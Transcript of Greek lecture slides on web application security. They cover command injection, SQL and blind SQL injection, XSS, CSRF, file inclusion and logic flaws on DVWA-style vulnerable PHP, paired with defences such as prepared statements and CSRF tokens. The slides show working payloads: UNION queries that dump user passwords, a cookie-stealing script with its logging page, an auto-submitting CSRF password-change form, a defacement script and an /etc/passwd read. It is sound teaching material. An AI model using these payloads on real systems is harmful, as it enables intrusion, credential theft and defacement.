Application Security in Practise
|
|
- Άνθεια Αθανασίου
- 5 χρόνια πριν
- Προβολές:
Transcript
1 Application Security in Practise Stefanos Haliasos
2 Attacks and Defences in Web Applications Injection Attacks Command Injection SQL Injections Blind SQL Injections XSS (DOM Based, Reflected, Stored) CSRF, cross-origin, same-origin Cookies Logic Flaws
3 Αρχή λειτουργίας web εφαρμογών
4 Ασφάλεια Web Εφαρμογών Ο εισβολέας κρύβει τον κακόβουλο κώδικα μέσα σε έγκυρα HTTP requests Οι εισβολείς μπορούν να παρέμβουν σε οποιοδήποτε τμήμα ενός HTTP request. URL querystring headers cookies DOM forms scripts stylesheets
5 Το πρόβλημα Η ανεπαρκής επικύρωση των δεδομένων εισόδου αποτελεί το τρωτό σημείο των web εφαρμογών
6
7 Demo setup, access 3.
8 Injection attacks
9 Injection Attacks Μια web εφαρμογή εκτελεί scripts στον server (Perl, Python, Ruby, PHP, Javascript) έχοντας πρόσβαση σε διάφορους πόρους (βάσεις δεδομένων, σύστημα αρχείων, third party services) Το αποτέλεσμα της εκτέλεσης επιστρέφει στον client Εάν οι παράμετροι του αιτήματος δεν επικυρωθούν σωστά, ο εισβολέας μπορεί να παρέμβει και να εκτελέσει τις δικές του εντολές
10 Command Injection
11 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping '. $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 '. $target ); } } // Feedback for the end user echo "<pre>{$cmd}</pre>";?>
12 Δύο βασικές προσεγγίσεις Blacklisting Καθορίστε τι δεν είναι αποδεκτό και επιτρέψτε οτιδήποτε άλλο Whitelisting Καθορίστε τι είναι αποδεκτό και απορρίψτε οτιδήποτε άλλο
13 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set blacklist $substitutions = array( '&&' => '', ';' => '', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping '. $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 '. $target ); } } // Feedback for the end user echo "<pre>{$cmd}</pre>";?>
14 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Check Anti-CSRF token checktoken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $target = $_REQUEST[ 'ip' ]; $target = stripslashes( $target ); // Split the IP into 4 octects $octet = explode( ".", $target ); // Check IF each octet is an integer if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $oc // If all 4 octets are int's put the IP back together. $target = $octet[0]. '.'. $octet[1]. '.'. $octet[2]. '.'. $octet[3]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping '. $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 '. $target ); } } // Feedback for the end user echo "<pre>{$cmd}</pre>"; } else { // Ops. Let the user name theres a mistake echo '<pre>error: You have entered an invalid IP.</pre>'; } // Generate Anti-CSRF token generatesessiontoken();?>
15 SQL injections
16 SQL injections Ο εισβολέας επιδιώκει μέσω της web εφαρμογής να επέμβει στα δεδομένα της βάσης Μια ιδιαίτερα διαδεδομένη επίθεση Συναντάται και σε μη διαδικτυακές εφαρμογές
17
18 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($globals[" mysqli_ston"], $query ) or die( '<pre>'. ((is_ob // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; } // Feedback for end user echo "<pre>id: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($globals[" mysqli_ston"]);?>
19 // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; %' or '0'='0 $query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';"; %' and 1=0 union select null, table_name from information_schema.tables # %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # 1 and 1=1 union select version(),database() #
20 // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindparam( ':id', $id, PDO::PARAM_INT ); $data->execute(); $row = $data->fetch(); // Make sure only 1 result is returned if( $data->rowcount() == 1 ) { // Get values $first = $row[ 'first_name' ]; $last = $row[ 'last_name' ]; } } // Feedback for end user echo "<pre>id: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
21 Blind SQL injections
22 Τα αποτελέσματα του query δεν είναι ορατά στον χρήστη.
23 1 and 1=1 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; # $id = "1 and 1=1" QUERY = SELECT first_name, last_name FROM users WHERE user_id = 1 and 1=1; Εαν υπάρχει SQL vulnerability, θα πρέπει να επιστρέφει το ίδιο δελτίο τύπου Αν η επικύρωση του αιτήματος ήταν σωστή, το 'id=5 AND 1=1' θα ερμηνεύονταν σαν μια τιμή και δεν θα επιστρέψει αποτέλεσμα.
24
25 Cross-Site Scripting (XSS)
26 Σύνοψη Λάθη υλοποίησης στο client side κώδικα Cookies Same origin policy Javascript Sandbox Εμποδίζεται η πρόσβαση στη μνήμη άλλων προγραμμάτων και στο σύστημα αρχείων
27 javascript στον browser Cookies Είναι ένα token που στέλνεται από τον server και αποθηκεύεται στον client με μορφή "name=value" To HTTP είναι stateless Συνεπώς χρησιμοποιούμε cookies Persistent cookies Ζουν θα πολλαπλά browser sessions. Η ημερομηνία τους ορίζεται από τον server Non-persistent cookies Διαρκούν όσο το browser session Secure cookies Στέλνονται μόνο σε κρυπτογραφημένες συνδέσεις (SSL) HttpOnly cookies Στέλνονται μόνο σε HTTP και HTTPS request και δεν είναι προσβάσιμα από την
28 Same origin policy Ένα origin καθορίζεται από τον server, το πρωτόκολλο και το port number: protocol://host:port Τα scripts μπορούν να έχουν πρόσβαση μόνο σε πόρους (π.χ. cookies) του ίδιου domain Απαγορεύει στα κακόβουλα scripts να χειρίζονται άλλες σελίδες στο πρόγραμμα περιήγησης και εμποδίζει την υποκλοπή δεδομένων.
29 Τι δεν περιορίζεται <script src="..."/> <img src="..."/> <a href="..."/> υποβολή φόρμας iframes
30 Cross-Site Scripting - XSS Παράκαμψη του same origin policy. Ο εισβολέας στέλνει το κακόβουλο script σε μια σελίδα θύμα. O browser του χρήστη δεν έχει κανέναν τρόπο να γνωρίζει ότι το script δεν είναι αξιόπιστο, και το εκτελεί. Το κακόβουλο script μπορεί να έχει πρόσβαση σε οποιαδήποτε cookies, session tokens, ή άλλες ευαίσθητες πληροφορίες που διατηρούνται στον browser και χρησιμοποιούνται σε αυτή τη σελίδα.
31
32 <?php if( isset( $_POST[ 'btnsign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxmessage' ] ); $name = trim( $_POST[ 'txtname' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = ((isset($globals[" mysqli_ston"]) && is_object($globals[" $message = htmlspecialchars( $message ); // Sanitize name input $name = str_replace( '<script>', '', $name ); $name = ((isset($globals[" mysqli_ston"]) && is_object($globals[" my }?> // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', $result = mysqli_query($globals[" mysqli_ston"], $query ) or die( '<p //mysql_close(); <script>alert("hello")</script>
33 <?php if( isset( $_POST[ 'btnsign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxmessage' ] ); $name = trim( $_POST[ 'txtname' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = ((isset($globals[" mysqli_ston"]) && is_object($globals[" $message = htmlspecialchars( $message ); // Sanitize name input $name = str_replace( '<script>', '', $name ); $name = ((isset($globals[" mysqli_ston"]) && is_object($globals[" my }?> // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', $result = mysqli_query($globals[" mysqli_ston"], $query ) or die( '<p //mysql_close(); <script>alert("hello")</script>
34 <?php if( isset( $_POST[ 'btnsign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxmessage' ] ); $name = trim( $_POST[ 'txtname' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = ((isset($globals[" mysqli_ston"]) && is_object($globals[" mysqli_ston"]))? $message = htmlspecialchars( $message ); // Sanitize name input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name ); $name = ((isset($globals[" mysqli_ston"]) && is_object($globals[" mysqli_ston"]))? my }?> // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysqli_query($globals[" mysqli_ston"], $query ) or die( '<pre>'. ((is_object //mysql_close(); <img src="" onerror="alert('gotcha!!')">
35 Cookie stealer <img src="" onerror="document.location=' +document.cookie;"/> <script>document.images[0].src=" +document.cookie;</script> # stealer.php <?php $cookie = $_GET["cookie"]; $my_file = 'cfile.txt'; $handle = fopen($my_file, 'a'); fwrite($handle, $cookie."\n"); fclose($handle);?>
36 <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ]!= NULL ) { // Check Anti-CSRF token checktoken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $name = htmlspecialchars( $_GET[ 'name' ] ); } // Feedback for end user echo "<pre>hello ${name}</pre>"; // Generate Anti-CSRF token generatesessiontoken();?> htmlspecialchars()
37 1. Stored XSS 2. Reflected XSS 3. DOM-Based XSS
38 Stored XSS Persistent
39
40 You enter data which is stored within the application and then returned later on in response to another request. This data contains JavaScript code which is executed in the context of the application
41 Reflected XSS Non-Persistent
42
43 You enter data to the application, which is then echoed back without escaping, sanitization or encoding and it's possible to include JavaScript code which is then executed in the context of the application
44 DOM-Based XSS
45 You enter data which modifies the DOM of the web page, this data contains JavaScript which is executed in the context of the application. It's relatively similar to reflected XSS but the difference is that in modifying the DOM the data might not ever got to the server
46 XSS tricks
47 Προστασία από XSS Η αντιμετώπιση των XSS επιθέσεων είναι ιδιαίτερα δύσκολη. Τα ευρέως γνωστά web frameworks (Ruby on Rails, Django,.NET) αντιμετωπίζουν επιτυχώς τις περισσότερες επιθέσεις με input sanitization. Χρήση template engines για την παραγωγή του HTML markup. Application-level firewalls. Static code analysis. Tα HttpOnly cookies δεν επιτρέπουν στην javascript να έχει πρόσβαση στο document. cookie. CSP (Content Security Policy)
48 Cross site request forgery
49 CSRF Ο εισβολέας χρησιμοποιώντας κακόβουλο κώδικα, αναγκάζει τον browser του θύματος να εκτελεί HTTP requests προς την ευάλωτη web εφαρμογή δίχως τη συγκατάθεση του χρήστη. Για κάθε request σε κάποιο domain, οι browsers περιλαμβάνουν αυτόματα όλα τα δεδομένα του χρήστη που σχετίζονται με αυτό το domain. (session ID, cookies, IP address, κτλ...). Ακόμη και για requests που πυροδοτούνται από μια form, ένα script ή μια εικόνα.
50
51 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($globals[" mysqli_ston"]) && is_object($globals[" mysqli_s $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '". dvwacurrent $result = mysqli_query($globals[" mysqli_ston"], $insert ) or die( '<pre>'. (( // Feedback for the user echo "<pre>password Changed.</pre>"; } else { // Issue with passwords matching echo "<pre>passwords did not match.</pre>"; } }?> ((is_null($ mysqli_res = mysqli_close($globals[" mysqli_ston"])))? false : $ my
52 GET Request <html><body> POST Request <form name="csrf_form" action=" method="post"> <input type="hidden" name="password_new" value="password1"> <input type="hidden" name="password_conf" value="password1"> <input type="submit" name="change" value="change"/> </form> <script type="text/javascript">document.csrf_form.submit();</script> </body></html>
53 Προστασία από επιθέσεις CSRF Ορθή χρήση των HTTP methods. ην χρησιμοποιείται GET για requests που αλλάζουν το state του server. έσω CSRF tokens που παράγονται από το session ID και ένα μυστικό token στον server. Τα CSRF tokens πρέπει να περιλαμβάνονται σε κάθε requests και να επαληθεύονται στον server. <form action="/transfer.php" method="post"> <input type="hidden" name="csrftoken" value="owy4nmqwode4"> <input type="text" name="amount"/> <input type="submit" value="transfer" /> </form>
54 File Inclusion
55
56 LFI (Local File Inclusion): ο επιτιθέμενος χρησιμοποιεί ένα αρχείο που υπάρχει στον server.?page=../../hackable/uploads/filea.php RFI (Remote File Inclusion): ο επιτιθέμενος χρησιμοποιεί ένα αρχείο που υπάρχει σε ένα άλλο origin?page=
57 <?php // The page we wish to display $file = $_GET[ 'page' ];?> <?php // The page we wish to display $file = $_GET[ 'page' ]; // Only allow include.php or file{1..3}.php if( $file!= "include.php" && $file!= "file1.php" && $file!= "file2.php" && $file!= "file3.ph // This isn't the page we want! echo "ERROR: File not found!"; exit; }?>
58 FileA.php <?php $a = shell_exec('mv../../index.php../../temp.php'); $b = shell_exec('mv index.html../../index.html'); echo "Defacement completed";?>
59 RFI File <?php $cmd = shell_exec("cat /etc/passwd"); echo "<pre>{$cmd}</pre>";?>
60 Logic flaws
61 O εισβολέας μπορεί να εκμεταλλευτεί σφάλματα στο business logic μιας εφαρμογής και να παραβιάσει το ομαλό workflow. H επίθεση μπορεί να έχει πολλές μορφές και στοχεύει στην λειτουργικότητα και την πολιτική ασφάλειας της εκάστοτε εφαρμογής. Ένα σφάλμα στο business logic μιας εφαρμογής μπορεί να εξελιχθεί σε σημαντικότερο κενό ασφάλειας.
62 Ο επιτιθέμενος κλειδώνει ένα χρήστη έξω από κάποια εφαρμογή (Προσπαθώντας να κάνει πολλές φορές login) Όταν δεν ελέγχουμε τα δεδομένα μας σε επίπεδο server και ο επιτιθέμενος αποφεύγει τις άμυνες του client
63 UI / UX Data Validation
64 Summary SQL injection XSS CSRF File Inclusion Prepared Statements htmlspecialchars() CSRF Token Whitelisting
65 Ερωτήσεις;;;
66 MIT 6.858: Computer Systems Security
WEB SECURITY. Διαφάνειες: Δημήτρης Καρακώστας Διονύσης Ζήνδρος. Εθνικό Μετσόβιο Πολυτεχνείο Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών
WEB SECURITY Διαφάνειες: Δημήτρης Καρακώστας Διονύσης Ζήνδρος Εθνικό Μετσόβιο Πολυτεχνείο Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών Βασική αρχή ασφάλειας του web Το web χρησιμοποιεί ένα μοντέλο
Διαβάστε περισσότεραΤεχνολογίες Διαδικτύου. Server Side Scripting I PHP
Τεχνολογίες Διαδικτύου Server Side Scripting I PHP Εισαγωγή PHP PHP:Hypertext Preprocessor Mηχανή που συνοδεύει web servers όπως ο IIS και ο Apache Η PHP είναι γλώσσα προγραμματισμού για web εφαρμογές
Διαβάστε περισσότεραApplication Security. Dimitris Mitropoulos
Application Security Dimitris Mitropoulos dimitro@grnet.gr
Διαβάστε περισσότεραΑσφάλεια, Διαθεσιμότητα και Ταχύτητα για τις Web Εφαρμογές
Ασφάλεια, Διαθεσιμότητα και Ταχύτητα για τις Web Εφαρμογές Barracuda Web Application Firewall Καλοχριστιανάκης Αντώνης Διευθυντής Πωλήσεων Digital SIMA Ανατομία Web επίθεσης Οι Web επιθέσεις δε διαφέρουν
Διαβάστε περισσότεραΕφαρµογές διαδικτύου µε PHP
Εφαρµογές διαδικτύου µε PHP Σταύρος Πολυβίου Αρχιτεκτονική τριών επιπέδων (three-tier architecture) SQL HTTP request Αποτελέσµατα (πίνακες) PHP HTML Σύστηµα διαχείρισης δεδοµένων (Database Management System)
Διαβάστε περισσότεραInjection Attacks. Protocol Host FilePath. field1=valuex&field2=valuey. Query String. Web server HTTP GET.
Πως γίνεται η πρόσβαση σήμερα; Το user input περνάει από ένα server-side script μέσω HTTP methods όπως POST/GET Το αίτημα επεξεργάζεται Ανάλογα ανοίγει πρόσβαση στη βάση Query database και ανάκτηση results
Διαβάστε περισσότεραΦορολογική Βιβλιοθήκη. Θανάσης Φώτης Προγραμματιστής Εφαρμογών
Φορολογική Βιβλιοθήκη Θανάσης Φώτης Προγραμματιστής Εφαρμογών Το έργο Η φορολογική βιβλιοθήκη πρόκειται για ένα έργο που φιλοδοξεί να αποτελέσει σημαντικό βοήθημα για τον επαγγελματία λογιστή και όχι μόνο.
Διαβάστε περισσότεραWeb and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol
HTTP Protocol Web and HTTP Βασικά Συστατικά: Web Server Web Browser HTTP Protocol Web Servers (1/2) Ένα πρόγραμμα (λογισμικό) που έχει εγκατασταθεί σε ένα υπολογιστικό σύστημα (έναν ή περισσότερους υπολογιστές)
Διαβάστε περισσότεραΑΣΦΑΛΕΙΑ. Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Δ. Ζήνδρος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών
ΑΣΦΑΛΕΙΑ Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Δ. Ζήνδρος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών Άδεια Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης
Διαβάστε περισσότερα10 η Διάλεξη Python Βάσεις δεδομένων στη python
10 η Διάλεξη Python Βάσεις δεδομένων στη python ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Η standard διεπαφη της python για βάσεις δεδομένων βασίζεται στο DB-API Python Database API υποστηρίζει ένα ευρύ φάσμα βάσεων δεδομένων
Διαβάστε περισσότεραΔρ. Δημήτριος Α. Κουτσομητρόπουλος. Τμήμα Επιχειρηματικού Σχεδιασμού και Πληροφοριακών Συστημάτων Α.Τ.Ε.Ι. Πάτρας 2012-2013
Εισαγωγή στην PHP Δρ. Δημήτριος Α. Κουτσομητρόπουλος Τμήμα Επιχειρηματικού Σχεδιασμού και Πληροφοριακών Συστημάτων Α.Τ.Ε.Ι. Πάτρας 2012-2013 Εισαγωγή στην PHP PHP : Hypertext Preprocessor Η PHP είναι μία
Διαβάστε περισσότεραWeb exploitation: Ένα πραγματικό παράδειγμα
Web exploitation: Ένα πραγματικό παράδειγμα Επιμέρους θέματα/προβλήματα: (1) Παράκαμψη προστασίας SQL Injection (2) Advanced UPDATE SQL Injection how-to Εισαγωγικές έννοιες Input Validation Code Injection
Διαβάστε περισσότεραγια την Ανάπτυξη Δυναμικών Διαδικτυακών Εφαρμογών»
ΕΛΛΗΝΙΚΗ ΔΗΜΟΚΡΑΤΙΑ ΠΑΝΕΠΙΣΤΗΜΙΟ ΚΡΗΤΗΣ «Προχωρημένα Θέματα Προγραμματισμού με PHP για την Ανάπτυξη Δυναμικών Διαδικτυακών Εφαρμογών» Γιάννης Σαμωνάκης Πανεπιστήμιο Κρήτης Σεμινάριο: Ανάπτυξη Διαδικτυακών
Διαβάστε περισσότεραΘέματα Προγραμματισμού Διαδικτύου ~ MySQL & PHP ~
Θέματα Προγραμματισμού Διαδικτύου ~ MySQL & PHP ~ Στελιος Σφακιανάκης Εαρινό 2019 Αυτή η εργασία χορηγείται με άδεια Creative Commons Αναφορά Δημιουργού - Μη Εμπορική Χρήση - Παρόμοια Διανομή 1 Ροή Δεδομένων
Διαβάστε περισσότεραΕισαγωγή στην Ανάπτυξη Εφαρμογών Web με Χρήση της Python, του Apache και του mod_python
Web Development με Python Εισαγωγή στην Ανάπτυξη Εφαρμογών Web με Χρήση της Python, του Apache και του mod_python Βασίλης Παπαβασιλείου , Κοινότητα Ελεύθερου Λογισμικού ΕΜΠ Python
Διαβάστε περισσότεραΑσφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή
Ασφάλεια Υπολογιστών Και Δικτύων Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ονοματεπώνυμο: Κυριακού Ανδρόνικος Αριθμός Μητρώου: 5806 Email: kyriakou@ceid.upatras.gr
Διαβάστε περισσότεραΗ HTML χρησιμοποιεί εντολές που ονομάζονται HTML tags δίνοντας εντολές στους Web browsers για το πώς να εμφανίζουν την κάθε ιστοσελίδα.
ΕΙΣΑΓΩΓΗ ΣΤΗΝ PHP Τι θα μάθουμε; Να καταλάβουμε τι είναι η PHP και πώς δουλεύουν τα PHP scripts Τι χρειάζεται για να ξεκινήσουμε με την PHP Να δημιουργήσουμε και να τρέξουμε ένα απλό script HTML PHP Η
Διαβάστε περισσότεραΕπισκόπηση προβλημάτων ασφαλείας, απειλών και κακόβουλων επιθέσεων αντίμετρα hands on lab/training module
Επισκόπηση προβλημάτων ασφαλείας, απειλών και κακόβουλων επιθέσεων αντίμετρα hands on lab/training module ikoniaris@gmail.com http://bruteforce.gr AUTH ACM Student Chapter 1 Τι είναι διαδικτυακή εφαρμογή
Διαβάστε περισσότεραΠαράρτημα A: PHP, HTML φόρμες και το πρωτόκολλο HTTP.
Εργαστήριο #5 Τι πρέπει να έχετε ολοκληρώσει από το προηγούμενο εργαστήριο. Θα πρέπει να ξέρετε να εισάγετε ένα βασικό πρόγραμμα PHP μέσα σε μια ιστοσελίδα, τη χρήση της echo και τον χειρισμό απλών μεταβλητών
Διαβάστε περισσότεραΠρογραμματισμός Διαδικτύου
Τμήμα Μηχανικών Πληροφορικής & Τηλεπικοινωνιών Προγραμματισμός Διαδικτύου Δρ. Μηνάς Δασυγένης mdasygenis@uowm.gr Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για
Διαβάστε περισσότεραΜετάφραση: Καζακώνης Αναστάσιος ΙΟΥΝΙΟΣ 2005
App Sec FAQ Μετάφραση: Καζακώνης Αναστάσιος ΙΟΥΝΙΟΣ 2005 Εισαγωγή Τι πραγµατεύεται αυτό το εγχειρίδιο? Το εγχειρίδιο αυτό απαντά σε ερωτήσεις προγραµµατιστών σχετικά µε την ασφάλεια των δικτυακών εφαρµογών.
Διαβάστε περισσότεραΑσφάλεια Πληροφοριακών Συστημάτων
Ανοικτά Ακαδημαϊκά Μαθήματα στο ΤΕΙ Ιονίων Νήσων Ασφάλεια Πληροφοριακών Συστημάτων Ενότητα 9: Code injections Θεματική Ενότητα: Επιθέσεις Το περιεχόμενο του μαθήματος διατίθεται με άδεια Creative Commons
Διαβάστε περισσότερα(C) 2010 Pearson Education, Inc. All rights reserved.
Connectionless transmission with datagrams. Connection-oriented transmission is like the telephone system You dial and are given a connection to the telephone of fthe person with whom you wish to communicate.
Διαβάστε περισσότεραΤείχος Προστασίας Εφαρμογών Διαδικτύου
Τείχος Προστασίας Εφαρμογών Διαδικτύου Web Application Firewalls Ιωάννης Στάης {istais@census-labs.com} Γιατί είναι σημαντική η προστασία των εφαρμογών ιστού; Πάνω από 70% όλων των επιθέσεων συμβαίνουν
Διαβάστε περισσότεραΔΟΜΗ. Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Δ. Ζήνδρος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών
ΔΟΜΗ Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Δ. Ζήνδρος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών Άδεια Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative
Διαβάστε περισσότεραΟδηγίες Ακολουθήστε τα παρακάτω βήματα. Βεβαιωθείτε ότι το πρόγραμμά σας δουλεύει σωστά σε κάθε βήμα, πριν προχωρήσετε στο επόμενο.
Εργαστήριο #11 Από τα προηγούμενα εργαστήρια: Το εργαστήριο αυτό είναι συνέχεια του 10 ου, το οποίο θα πρέπει να έχετε ολοκληρώσει (τουλάχιστον χωρίς τη μορφοποίηση!). Θα χρειαστείτε επίσης ορισμένες από
Διαβάστε περισσότεραΠανεπιστήμιο Πειραιώς Τμήμα Πληροφορικής
Πανεπιστήμιο Πειραιώς Τμήμα Πληροφορικής Πρόγραμμα Μεταπτυχιακών Σπουδών «Πληροφορική» Μεταπτυχιακή Διατριβή Τίτλος Διατριβής SQL injection σε εκπαιδευτική εφαρμογή DVWA και μηχανισμοί προστασίας βάσεων
Διαβάστε περισσότεραPHP Functions. by George Girtsou Copyright All Rights Reserved. Με την επιφύλαξη κάθε νόμιμου δικαιώματος.
PHP Functions by George Girtsou Copyright All Rights Reserved ΠΝΕΥΜΑΤΙΚΑ ΔΙΚΑΩΜΑΤΑ Όλα τα δικαιώματα συμπεριλαμβανομένου της πνευματικής ιδιοκτησίας επί του περιεχομένου, βρίσκονται υπό την κατοχή ή τον
Διαβάστε περισσότερα, Evaluation of a library against injection attacks
THE INSTITUTE OF ELECTRONICS, INFMATION AND COMMUNICATION ENGINEERS TECHNICAL REPT OF IEICE., () 211 8588 4 1 1 221 0835 2 14 1 E-mail: okubo@jp.fujitsu.com, tanaka@iisec.ac.jp Web,,,, Evaluation of a
Διαβάστε περισσότεραPHP/MySQL και Project
PHP/MySQL και Project Μια απλή διαδικτυακή εφαρμογή Γεώργιος Ευαγγελίδης Τμήμα Εφαρμοσμένης Πληροφορικής Σχολή Επιστημών Πληροφορίας Πανεπιστήμιο Μακεδονίας Περιεχόμενα PHP (Middle tier) Διαδικτυακές εφαρμογές
Διαβάστε περισσότεραΕυπάθειες Διαδικτυακών Εφαρμογών & Web Εξυπηρετητών
Πανεπιστήμιο Πειραιώς Ευπάθειες Διαδικτυακών Εφαρμογών & Web Εξυπηρετητών Κυριαζής Άγγελος Επιβλέπων καθηγητής : Κωνσταντίνος Λαµπρινουδάκης ΠΑΝΕΠΙΣΤΗΜΙΟ ΠΕΙΡΑΙΩΣ ΤΜΗΜΑ ΨΗΦΙΑΚΩΝ ΣΥΣΤΗΜΑΤΩΝ Π.Μ.Σ. ΔΙΔΑΚΤΙΚΗ
Διαβάστε περισσότεραBasic Missions
www.hackthissite.org Basic Missions Προγουλάκης Νίκος Α.Μ.: 2582 2010-2011 (Ε) www.hackthissite.org 1 www.hackthissite.org www.hackthissite.org 2 www.hackthissite.org www.hackthissite.org 3 www.hackthissite.org
Διαβάστε περισσότεραWeb Programming for Dummies
Web Programming for Dummies Γράψαμε αυτό το tutorial, αφού ολοκληρώσαμε την άσκηση Προγραμματισμού στον Παγκόσμιο Ιστό. Προσπαθήσαμε να γράψουμε γενικά πράγματα που βρήκαμε εμείς μετά από αναζητήσεις.aποφύγαμε
Διαβάστε περισσότεραΚΥΠΡΙΑΚΗ ΕΤΑΙΡΕΙΑ ΠΛΗΡΟΦΟΡΙΚΗΣ CYPRUS COMPUTER SOCIETY ΠΑΓΚΥΠΡΙΟΣ ΜΑΘΗΤΙΚΟΣ ΔΙΑΓΩΝΙΣΜΟΣ ΠΛΗΡΟΦΟΡΙΚΗΣ 6/5/2006
Οδηγίες: Να απαντηθούν όλες οι ερωτήσεις. Ολοι οι αριθμοί που αναφέρονται σε όλα τα ερωτήματα είναι μικρότεροι το 1000 εκτός αν ορίζεται διαφορετικά στη διατύπωση του προβλήματος. Διάρκεια: 3,5 ώρες Καλή
Διαβάστε περισσότεραDynamic types, Lambda calculus machines Section and Practice Problems Apr 21 22, 2016
Harvard School of Engineering and Applied Sciences CS 152: Programming Languages Dynamic types, Lambda calculus machines Apr 21 22, 2016 1 Dynamic types and contracts (a) To make sure you understand the
Διαβάστε περισσότεραΟδηγίες Αγοράς Ηλεκτρονικού Βιβλίου Instructions for Buying an ebook
Οδηγίες Αγοράς Ηλεκτρονικού Βιβλίου Instructions for Buying an ebook Βήμα 1: Step 1: Βρείτε το βιβλίο που θα θέλατε να αγοράσετε και πατήστε Add to Cart, για να το προσθέσετε στο καλάθι σας. Αυτόματα θα
Διαβάστε περισσότεραΑντώνης Χρυσόπουλος Στέλιος Μόσχογλου Θεοδόσης Σουργκούνης ΔΟΜΗΣΗ ΚΩΔΙΚΑ. Μαθαίνω παίζοντας
Αντώνης Χρυσόπουλος Στέλιος Μόσχογλου Θεοδόσης Σουργκούνης ΔΟΜΗΣΗ ΚΩΔΙΚΑ Μαθαίνω παίζοντας Σήμερα παιδάκια μου θα μάθουμε... 1. Δόμηση Κώδικα 2. Στυλ Κώδικα 3. Συνεργασία Σε Ομάδες - Διαχωρισμός Σε Αρχεία
Διαβάστε περισσότεραΤεχνολογίες Ανάπτυξης Εφαρμογών στο WEB
Τεχνολογίες Ανάπτυξης Εφαρμογών στο WEB Χρήστος Φείδας 1999 1. Εισαγωγή Στα πρώτα χρόνια ύπαρξης του το web παρείχε μόνο στατικές σελίδες μίας και αυτός ήταν ο πρωταρχικός σκοπός του. Καθώς όμως αυξανόταν
Διαβάστε περισσότεραΠΡΟΣΟΧΗ: Οι απαντήσεις πολλαπλής επιλογής µόνο πάνω στο ΦΥΛΛΟ ΑΠΑΝΤΗΣΕΩΝ
